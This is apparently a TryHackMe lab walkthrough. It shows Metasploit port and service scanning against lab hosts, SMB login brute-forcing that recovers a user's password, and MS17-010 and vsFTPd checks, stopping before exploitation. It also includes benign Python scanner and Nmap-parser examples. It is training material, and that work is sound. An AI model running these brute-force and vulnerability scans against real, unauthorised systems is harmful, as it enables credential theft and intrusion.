
Metasploit: Scanning and Exploitation (TryHackMe)

Updated
37 min read
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Link to the Walkthrough/Challenge on TryHackMe: Metasploit: Scanning and Exploitation

Introduction

In the previous room, you learned how to navigate the Metasploit Framework: searching for modules, configuring parameters, launching exploits, and managing sessions. Those are the mechanics. In this room, you put them to work.

Stratford Systems has given your team the green light to proceed with active testing against their internal network. Your scope includes a small subnet containing a Windows workstation and a Linux server, both running production services. Your objectives are straightforward: identify what is running on each host, determine which services are vulnerable, exploit those vulnerabilities to gain access, and document your findings.

Learning Objectives

  • Scan target systems using Metasploit's built-in port scanning and service enumeration modules

  • Store and manage results using the Metasploit database, including workspaces, host tracking, and credential storage

  • Identify vulnerabilities by running targeted scanner modules against discovered services

  • Exploit vulnerable services on two different target systems using two distinct exploit types, demonstrating that the Metasploit workflow generalizes across protocols, operating systems, and vulnerability classes

Prerequisites

This room builds directly on Metasploit: The Basics. You should be comfortable with:

  • Launching msfconsole and using search, use, info, and back

  • Setting module parameters with set, setg, and show options

  • Running modules with exploit/run and managing sessions with background, sessions, and sessions -i

Scanning with Metasploit

You have two lab machines on the Stratford Systems network and no information beyond their IP addresses. Before you can exploit anything, you need to know what is running on each host: which ports are open, what services are listening, and what versions those services are running. This is where scanning begins.

You might be wondering: why scan with Metasploit when you already know how to use Nmap? The short answer is database integration. When you scan from within msfconsole, the results can flow directly into the Metasploit database (which we will set up in the next task), making them instantly available to other modules. You can also run Nmap directly from the msfconsole prompt, giving you the best of both worlds.

Port Scanning with Metasploit Modules

Metasploit includes several port scanning modules under auxiliary/scanner/portscan/. You can list them with search portscan:

msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce              .                normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan          .                normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner      .                normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                   .                normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                    .                normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                    .                normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                    .                normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access  .                normal  No     Wordpress Pingback Locator
msf6 >

The most commonly used is auxiliary/scanner/portscan/tcp, which performs a full TCP connect scan. Let's load it and look at its options:

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

 Name         Current Setting  Required  Description
 ----         ---------------  --------  -----------
 CONCURRENCY  10               yes       The number of concurrent ports to check per host
 DELAY        0                yes       The delay between connections, per thread, in milliseconds
 JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
 PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
 RHOSTS                        yes       The target host(s), [...]
 THREADS      1                yes       The number of concurrent threads (max one per host)
 TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

A few things to note about these options:

  • PORTS: The default range is 1-10000. This is not the same as Nmap's default, which scans the 1,000 most commonly used ports. Metasploit checks every port in the range you give it, so a full 1-65535 sweep is slow. For a quick scan, narrow this to 1-1024 or list the individual ports you care about.

  • THREADS: The number of hosts scanned in parallel. The module caps this at one thread per host, so raising it only helps when RHOSTS contains several targets; against a single host it makes no difference. A value of 10 is reasonable for most lab environments.

  • CONCURRENCY: How many ports are checked simultaneously on each host. For a single-host scan this, not THREADS, is the setting that determines speed, and together with TIMEOUT it bounds how long the scan can take.

Let's scan the Stratford Windows workstation:

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024,3389,8000-8100
PORTS => 1-1024,3389,8000-8100
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/portscan/tcp) > run

[+] MACHINE_IP          - MACHINE_IP:135 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:139 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:445 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:3389 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:8000 - TCP OPEN
[*] MACHINE_IP          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
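To make the three options concrete, here is a small connect scanner written for this walkthrough in Python. It is an added example, not code from the TryHackMe room or from Metasploit. It borrows the module's option names (PORTS, THREADS, CONCURRENCY, TIMEOUT) so that each option's effect is visible in the code, and it includes a self-test that opens a listener on the loopback interface so it can be run without a lab target.

```python
"""Minimal TCP connect scanner mirroring auxiliary/scanner/portscan/tcp.

Added example for this walkthrough; not code from the TryHackMe room or
from Metasploit. Option names are borrowed from the module so the mapping
from option to behaviour is visible; the implementation is ours.
"""
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, List, Sequence


def parse_ports(spec: str) -> List[int]:
    """Expand a Metasploit-style PORTS string, e.g. "1-1024,3389,8000-8100"."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            if lo > hi:
                lo, hi = hi, lo          # tolerate "25-22"
            ports.update(range(lo, hi + 1))
        else:
            ports.add(int(part))
    bad = sorted(p for p in ports if not 0 < p < 65536)
    if bad:
        raise ValueError(f"port out of range: {bad}")
    return sorted(ports)


def _connect(host: str, port: int, timeout_ms: int) -> bool:
    """Full three-way handshake (a connect scan); True if the port accepted."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout_ms / 1000)
        try:
            s.connect((host, port))
            return True
        except OSError:              # refused, timed out, unreachable
            return False


def scan_host(host: str, ports: str = "1-10000", concurrency: int = 10,
              timeout_ms: int = 1000) -> List[int]:
    """One host; CONCURRENCY ports in flight at a time, as the module does."""
    targets = parse_ports(ports)
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        hits = list(pool.map(lambda p: _connect(host, p, timeout_ms), targets))
    return [p for p, open_ in zip(targets, hits) if open_]


def scan_hosts(hosts: Sequence[str], ports: str = "1-10000", threads: int = 1,
               concurrency: int = 10, timeout_ms: int = 1000) -> Dict[str, List[int]]:
    """THREADS hosts scanned in parallel; never more threads than hosts."""
    workers = max(1, min(threads, len(hosts)))
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda h: scan_host(h, ports, concurrency, timeout_ms), hosts)
    return dict(zip(hosts, results))


def demo_local_scan() -> Dict[str, object]:
    """Self-contained check: listen on one loopback port, scan a window around it.

    The listener never accept()s; the kernel still completes the handshake,
    which is exactly why a connect scan needs no application-level reply.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # OS picks a free ephemeral port
    listener.listen(5)
    port = listener.getsockname()[1]
    spec = f"{port - 2}-{port + 2}"
    try:
        found = scan_hosts(["127.0.0.1"], spec, threads=10, concurrency=5,
                           timeout_ms=500)["127.0.0.1"]
    finally:
        listener.close()
    return {"listening": port, "spec": spec, "open": found}


if __name__ == "__main__":
    print(parse_ports("22-25,80,110-112"))
    print(demo_local_scan())
```

Run it with python3 and it prints the expanded port list and the loopback result. The point to notice is where the parallelism lives: THREADS fans out across hosts, CONCURRENCY across the ports of one host, exactly the split that the module's option descriptions state.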

The TCP port scanner tells you only which ports are open; it does not identify the services behind them or their versions. For that, run a version scan. msfconsole hands commands it does not recognise to the underlying shell, so you can run nmap -sV -O MACHINE_IP at the msf6 prompt without leaving the framework (the full output of that scan against the lab machine is in the answers section below). The version scan shows that port 445 is microsoft-ds, the SMB service of a Windows host, and that port 8000 is an HTTP server identifying itself as webfs/1.21.

Note: The key difference between running nmap and using db_nmap (which we will cover in the next task) is that nmap results are displayed but not stored in the Metasploit database. If you want scan results to be automatically stored and queryable, use db_nmap instead.

Service-Specific Scanners

Metasploit's auxiliary modules include scanners designed for specific protocols. These go beyond port discovery and provide targeted enumeration. Let's use a few against our Stratford target.

NetBIOS Name Scanner

The auxiliary/scanner/netbios/nbname module queries the NetBIOS name service to identify hostnames and domain membership:

msf6 > use auxiliary/scanner/netbios/nbname
msf6 auxiliary(scanner/netbios/nbname) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/netbios/nbname) > run

[*] Sending NetBIOS requests to MACHINE_IP->MACHINE_IP (1 hosts)
[+] 10.80.137.252 [STRATFORD-WS01] OS:Windows Names:(STRATFORD-WS01)  Mac:00:50:56:ab:cd:ef Virtual Machine:VMWare
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/netbios/nbname) >

This confirms the machine's NetBIOS name is STRATFORD-WS01.

HTTP Version Scanner

The auxiliary/scanner/http/http_version module fingerprints web servers:

msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/http_version) > run

[+] MACHINE_IP:8000 webfs/1.21
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >

Port 8000 is running webfs/1.21, a lightweight HTTP file server. This is a useful data point for later vulnerability research.

SMB Login Brute-Force

Note: Brute-forcing with large wordlists may take a considerable amount of time. You should generally target specific/confirmed users, and on a domain-joined target check the account lockout policy first: a long wordlist against a single username can lock that account out and disrupt the client.

The auxiliary/scanner/smb/smb_login module attempts to authenticate against the SMB service using a wordlist. This is how you test for weak credentials:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/smb/smb_login) > set SMBUSER penny
SMBUSER => penny
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
PASS_FILE => /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/smb/smb_login) > run

[+] MACHINE_IP:445       - MACHINE_IP:445 - Success: '.\penny:REDACTED'
[*] MACHINE_IP:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

The scanner found valid credentials for the user penny (the password is redacted in the output above; the room's example uses leo1234, and in the walkthrough below the lab instance's password turned out to be Spring2013). This is exactly the kind of "low-hanging fruit" that scanning uncovers. In a real engagement, weak credentials like this are disturbingly common and often provide the fastest path to initial access.

Choosing the Right Scanner

Metasploit contains hundreds of auxiliary scanner modules. You do not need to memorize them. The pattern is always the same:

  1. Identify an open port and service from your scan results

  2. Use search type:auxiliary <service_name> to find relevant scanner modules

  3. Use info to understand what the module does

  4. Set parameters and run

For example, if you found an FTP service on port 21, you might search for search type:auxiliary ftp and discover modules for anonymous login testing, version detection, and brute-force authentication. The discovery process is the skill; the specific modules are reference material.

Answer the questions below

Commands used for this task:

msfconsole
search portscan
use 5
show options
set RHOSTS 10.113.179.218
set PORTS 1-1024,3389,8000-8100
set THREADS 10
run
nmap -sV -O 10.113.179.218

How many open ports did the scan discover on the Stratford Windows workstation? 5

msf > search portscan
[... same module list as in the task above; auxiliary/scanner/portscan/tcp is entry 5 ...]

Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf > use 5
msf auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.

msf auxiliary(scanner/portscan/tcp) > set RHOSTS 10.113.179.218
RHOSTS => 10.113.179.218
msf auxiliary(scanner/portscan/tcp) > set PORTS 1-1024,3389,8000-8100
PORTS => 1-1024,3389,8000-8100
msf auxiliary(scanner/portscan/tcp) > set THREADS 10
THREADS => 10
msf auxiliary(scanner/portscan/tcp) > run
[+] 10.113.179.218        - 10.113.179.218:135 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:139 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:445 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:3389 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:8000 - TCP OPEN
[*] 10.113.179.218        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/portscan/tcp) > nmap -sV -O 10.113.179.218

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  http-alt      webfs/1.21

Using the NetBIOS scanner, what is the NetBIOS name of the target? STRATFORD-WS01

msf auxiliary(scanner/portscan/tcp) > back
msf > use auxiliary/scanner/netbios/nbname
msf auxiliary(scanner/netbios/nbname) > set RHOSTS 10.113.179.218
RHOSTS => 10.113.179.218
msf auxiliary(scanner/netbios/nbname) > run
[*] Sending NetBIOS requests to 10.113.179.218->10.113.179.218 (1 hosts)
[+] 10.113.179.218 [STRATFORD-WS01] OS:Windows Names:(STRATFORD-WS01)  Mac:00:50:56:ab:cd:ef Virtual Machine:VMWare
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What service is running on port 8000? webfs/1.21

Using the SMB login scanner and the provided wordlist, what is the penny user's password? Spring2013

msf auxiliary(scanner/netbios/nbname) > back
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_login) > set RHOSTS 10.113.179.218
RHOSTS => 10.113.179.218
msf auxiliary(scanner/smb/smb_login) > set SMBUSER penny
SMBUSER => penny
msf auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
PASS_FILE => /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
msf auxiliary(scanner/smb/smb_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(scanner/smb/smb_login) > run
[+] 10.113.179.218:445    - 10.113.179.218:445    - Success: '.\penny:Spring2013'
[*] 10.113.179.218:445    - Scanned 1 of 1 hosts (100% complete)
[*] 10.113.179.218:445    - Bruteforce completed, 1 credential was successful.
[*] 10.113.179.218:445    - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >

The Metasploit Database

You have just scanned STRATFORD-WS01 and discovered 5 open ports. Now imagine a real engagement where your scope includes fifty hosts, each with a handful of open services. Are you going to remember which ports were open on each one? Are you going to retype IP addresses every time you switch modules?

Metasploit solves this problem with a built-in database backed by PostgreSQL. The database stores hosts, services, credentials, and vulnerability data from your scans, and makes all of it queryable from within msfconsole. Instead of manually tracking results in notes or spreadsheets, you can let the framework manage your engagement data for you.

Setting Up the Database

On the TryHackMe AttackBox, the Metasploit database is already configured and ready to use. If you are working on your own Kali Linux installation, you will need to initialize it first.

On Kali Linux, the setup requires two steps:

┌──(kali㉿kali)-[~]
└─$ sudo msfdb init
[i] Database already started
[i] Creating database user 'msf'
[i] Creating databases 'msf' and 'msf_test'
[i] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[i] Creating initial database schema

Then launch msfconsole and verify the connection:

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >

If you see Connected to msf, the database is ready. If you see No connection, the PostgreSQL service may not be running. Start it with sudo systemctl start postgresql, then try sudo msfdb init again.

Important: On Kali Linux, the correct command is sudo msfdb init. You may encounter older tutorials that recommend sudo -u postgres msfdb init, which is the upstream (non-Kali) approach. Kali ships its own version of the msfdb script that handles PostgreSQL user creation internally and expects to be run with sudo.

Workspaces

Workspaces let you isolate data from different engagements. All scan results, hosts, services, and credentials are scoped to the current workspace. When you first launch msfconsole with a database, you are in the default workspace:

msf6 > workspace
* default
msf6 >

The * indicates the active workspace. Let's create a workspace for our Stratford Systems engagement and switch to it:

msf6 > workspace -a stratford
[*] Added workspace: stratford
[*] Workspace: stratford
msf6 > workspace
 default
* stratford
msf6 >

From this point forward, every scan result and credential we collect will be stored under the stratford workspace. If you later start a different engagement, you can create a new workspace for it without mixing data.

To switch between workspaces, type workspace followed by the name:

msf6 > workspace default
[*] Workspace: default
msf6 > workspace stratford
[*] Workspace: stratford
msf6 >

To delete a workspace (and all its data), use workspace -d <name>.

Scanning Into the Database With db_nmap

The db_nmap command is one of the most valuable features of the database integration. It runs Nmap with whatever flags you specify, but instead of just printing results to the screen, it automatically stores everything in the database: hosts, ports, service names, versions, and OS detection data.

Let's scan the Stratford target:

msf6 > db_nmap -sV -O MACHINE_IP
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2026-05-14 07:30 BST
[*] Nmap: Nmap scan report for MACHINE_IP
[*] Nmap: Host is up (0.0012s latency).
[*] Nmap: Not shown: 995 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  tcpwrapped
[*] Nmap: 445/tcp  open  microsoft-ds?
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Services
[*] Nmap: 8000/tcp open  http-alt      webfs/1.21

msf6 >

The host is now stored in the database. Let's query what we found.

Querying the Database: Hosts, Services, and Credentials

hosts

The hosts command lists every host the database knows about:

msf6 > hosts

Hosts
=====

address        mac  name  os_name           os_flavor  os_sp  purpose  info  comments
-------        ---  ----  -------           ---------  -----  -------  ----  --------
MACHINE_IP              Windows Longhorn                    device

msf6 >

services

The services command lists every open port and its associated service across all hosts in the current workspace:

msf6 > services

Services
========

host            port   proto  name          state  info
----            ----   -----  ----          -----  ----
MACHINE_IP       135   tcp    msrpc          open   Microsoft Windows RPC
MACHINE_IP       139   tcp    tcpwrapped     open
MACHINE_IP       445   tcp    microsoft-ds   open
MACHINE_IP       3389  tcp    ms-wbt-server  open   Microsoft Terminal Services
MACHINE_IP       8000  tcp    http-alt       open   webfs/1.21


msf6 >

You can filter services with the -S flag. For example, to find only webfs services across all scanned hosts:

msf6 > services -S webfs
Services
========

host           port  proto  name      state  info
----           ----  -----  ----      -----  ----
10.80.137.252  8000  tcp    http-alt  open   webfs/1.21

msf6 >

creds

The creds command displays any credentials that Metasploit has collected during the engagement. Remember the SMB brute-force we ran in the previous task? If the database was active during that scan, the successful login was stored automatically:

msf6 > creds

Credentials
===========

host            origin          service          public  private   realm  private_type
----            ------          -------          ------  -------   -----  ------------
MACHINE_IP      MACHINE_IP      445/tcp (smb)    penny   leo1234          Password

msf6 >

The penny:leo1234 credential is now available for any module that needs authentication. This is one of the major advantages of database integration: information collected by one module is automatically available to every other module.

Using Database Hosts as RHOSTS

One of the most practical database features is the hosts -R command, which takes every host in the database and automatically populates the RHOSTS parameter of the current module:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > hosts -R

Hosts
=====

address      mac  name  os_name       os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------       ---------  -----  -------  ----  --------
MACHINE_IP             Windows 2012                    server

RHOSTS => MACHINE_IP

msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (scanner/smb/smb_login):

 Name         Current Setting              Required  Description
 ----         ---------------              --------  -----------
 RHOSTS       MACHINE_IP                   yes       The target host(s), [...]
 [...]

No manual IP entry required. With dozens of targets, this saves significant time and eliminates transcription errors. You can also use services -R to populate RHOSTS from a specific service filter (e.g., services -S smb -R to target only hosts with SMB).

Importing External Scan Results

If you ran Nmap outside of msfconsole and saved the results to an XML file, you can import them with db_import:

msf6 > db_import /path/to/nmap_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.15.5'
[*] Importing host MACHINE_IP
[*] Successfully imported /path/to/nmap_scan.xml
msf6 >

This supports Nmap XML format, as well as output from several other tools (Nessus, Qualys, Burp Suite, etc.). The db_export command lets you export your database contents for reporting or archival purposes.
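What db_nmap and db_import actually store, and what services -S and the -R flag then do with it, is easier to see with the data in hand. The following Python is an added example written for this walkthrough; it is not Metasploit's importer, which is Ruby and parses with Nokogiri, as the db_import output above shows. The Nmap XML inside it is constructed by hand to mirror the Stratford scan on this page; the Linux server's address 10.80.137.253 is an assumption, since the page never shows stratford-srv01's IP.

```python
"""Nmap XML -> hosts/services, the job db_nmap and db_import do for you.

Added example for this walkthrough; not Metasploit's importer (Ruby, Nokogiri).
The XML is constructed by hand to mirror the Stratford scan on the page;
10.80.137.253 for stratford-srv01 is an assumed address.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX stratford.xml 10.80.137.252 10.80.137.253">
  <host>
    <address addr="10.80.137.252" addrtype="ipv4"/>
    <address addr="00:50:56:AB:CD:EF" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="closed"/><service name="ftp"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="tcpwrapped"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
      <port protocol="tcp" portid="8000"><state state="open"/><service name="http-alt" product="webfs" version="1.21"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows Server 2008 R2" accuracy="95"/></os>
  </host>
  <host>
    <address addr="10.80.137.253" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.2p1"/></port>
    </ports>
    <os><osmatch name="Linux" accuracy="90"/></os>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class Host:
    address: str
    mac: str
    os_name: str


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


def parse_nmap_xml(xml_text: str) -> Tuple[List[Host], List[Service]]:
    """Return (hosts, services) in the shape of the hosts / services tables."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for h in root.iter("host"):
        ipv4 = h.find("address[@addrtype='ipv4']")
        if ipv4 is None:                      # nothing to key the host on
            continue
        ip = ipv4.get("addr")
        mac = h.find("address[@addrtype='mac']")
        osm = h.find("os/osmatch")            # best -O guess, if any
        hosts.append(Host(ip, mac.get("addr") if mac is not None else "",
                          osm.get("name") if osm is not None else ""))
        for p in h.iter("port"):
            svc = p.find("service")
            name, info = "", ""
            if svc is not None:
                name = svc.get("name", "")
                # the info column is product + version as -sV reported them
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            services.append(Service(ip, int(p.get("portid")), p.get("protocol"),
                                    name, p.find("state").get("state"), info))
    return hosts, services


def filter_services(services: List[Service], term: Optional[str] = None,
                    port: Optional[int] = None, open_only: bool = True) -> List[Service]:
    """services -S <term> / services -p <port>: substring match on name or
    info, or an exact port; open ports only unless told otherwise."""
    t = term.lower() if term else None
    return [s for s in services
            if (t is None or t in s.name.lower() or t in s.info.lower())
            and (port is None or s.port == port)
            and (s.state == "open" or not open_only)]


def rhosts_from(services: List[Service]) -> str:
    """The -R flag: unique addresses, space separated, as RHOSTS accepts them."""
    seen: List[str] = []
    for s in services:
        if s.host not in seen:
            seen.append(s.host)
    return " ".join(seen)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for s in services:
        print(f"{s.host:<15} {s.port:<5} {s.proto:<5} {s.name:<14} {s.state:<6} {s.info}")
    print("services -S ftp -R  => RHOSTS =", rhosts_from(filter_services(services, "ftp")))
    print("services -S smb -R  => RHOSTS =", repr(rhosts_from(filter_services(services, "smb"))))
    print("services -p 445 -R  => RHOSTS =", rhosts_from(filter_services(services, port=445)))
```

Two things worth noticing when you run it. The closed port 21 on the workstation is parsed but excluded from the "ftp" target list, which is why services -S ftp -R on the page populated RHOSTS with only the Linux server. And Nmap names port 445 microsoft-ds, so services -S smb matches nothing until some other module has written smb into the name column; filtering by port (services -p 445 -R) is the more reliable way to build an SMB target list from a fresh db_nmap import.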

Answer the questions below

What command do you use to check if the Metasploit database is connected? db_status

What command creates a new workspace called "stratford"? workspace -a stratford

What command runs an Nmap scan and automatically stores the results in the Metasploit database? db_nmap

You are about to run an auxiliary module and want to automatically set RHOSTS to every host in the database. What command do you use? hosts -R

Vulnerability Scanning

You have open ports, service names, and version numbers stored in your database. Now the question becomes: which of these services have known, exploitable vulnerabilities? This is the step that bridges scanning and exploitation.

In penetration testing, the term low-hanging fruit refers to vulnerabilities that are easy to identify and straightforward to exploit. These are often the fastest path to initial access: unpatched services, default credentials, misconfigurations, and known backdoors. Metasploit's auxiliary scanner modules are designed to check for exactly these kinds of issues.

The Approach: Service Versions Drive Module Selection

The key to effective vulnerability scanning with Metasploit is connecting the service information you have already collected to the right scanner modules. Consider what db_nmap revealed about the Stratford Systems network:

  • Port 445 on STRATFORD-WS01: Microsoft Windows Server 2008

  • Port 21 on stratford-srv01: vsftpd 2.3.4

  • Port 22 on stratford-srv01: OpenSSH 8.2p1

Each of these version strings is a search query waiting to happen. If a service version has a known vulnerability, there is a good chance Metasploit has a scanner module to test for it.

Example 1: Checking for MS17-010 (EternalBlue)

Info: You can follow along using the Machine in Task 5.

The SMB service on STRATFORD-WS01 is running on a Windows Server 2008 host. One of the most critical SMB vulnerabilities in Windows Server 2008 is MS17-010, the flaw exploited by EternalBlue. Metasploit includes a dedicated scanner to check for it:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] MACHINE_IP:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] MACHINE_IP:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

The [+] prefix and "Host is likely VULNERABLE" message report the finding. The check is non-destructive: it looks at how the server responds to a specific SMB request rather than triggering the bug, so "likely" is as strong a statement as a scanner can make, but a host that answers this way is missing the MS17-010 patch and is a strong candidate for exploitation.

After running this scanner, check the vulns command:

msf6 > vulns

Vulnerabilities
===============

Timestamp                Host            Name                                    References
---------                ----            ----                                    ----------
2026-03-18 15:22:10 UTC  MACHINE_IP      MS17-010 SMB RCE Detection              CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,[...]

msf6 >

The vulnerability has been automatically recorded in the database, complete with CVE references. This is the kind of structured data that makes reporting easier at the end of an engagement.

Example 2: Checking for Anonymous FTP Access

Info: You can follow along using the Machine in Task 6.

The Linux server (stratford-srv01) is running vsftpd 2.3.4 on port 21. Before we look for exploits, a quick check for anonymous access is worthwhile:

msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > services -S ftp -R
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/ftp/anonymous) > run

[*] MACHINE_IP:21        - MACHINE_IP:21 - Banner: 220 (vsFTPd 2.3.4)
[-] MACHINE_IP:21        - MACHINE_IP:21 - Login failed: anonymous:mozilla@example.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) >

Anonymous login failed, which is the correct configuration on the server's side. But notice two things in this example: first, we used services -S ftp -R to automatically populate RHOSTS with only the hosts that have an FTP service, pulling the data directly from the database. Second, the banner confirms vsFTPd 2.3.4. That specific version has a well-known backdoor vulnerability, which we will exploit in the next task.

The Vulnerability Scanning Pattern

Across both examples, the workflow follows the same pattern:

  1. Review service versions from your db_nmap results (using services or services -S)

  2. Search for relevant scanner modules (search type:auxiliary <service_or_cve>)

  3. Load the module, set RHOSTS (manually or via hosts -R / services -R), and run

  4. Check vulns to see what was recorded

The goal is not to run every scanner module in Metasploit. The goal is to make targeted, informed checks based on what you already know about the target environment. A version string like vsftpd 2.3.4 or Microsoft Windows Server 2008 immediately narrows your search space to a handful of relevant modules.

You have completed the reconnaissance cycle: port scanning, service enumeration, and vulnerability identification. The Stratford Systems network has two confirmed findings. STRATFORD-WS01 is vulnerable to MS17-010 (EternalBlue) on its SMB service. The Linux server, stratford-srv01, is running vsftpd 2.3.4 on port 21, a version with a well-documented backdoor. It is time to move from identifying vulnerabilities to exploiting them.

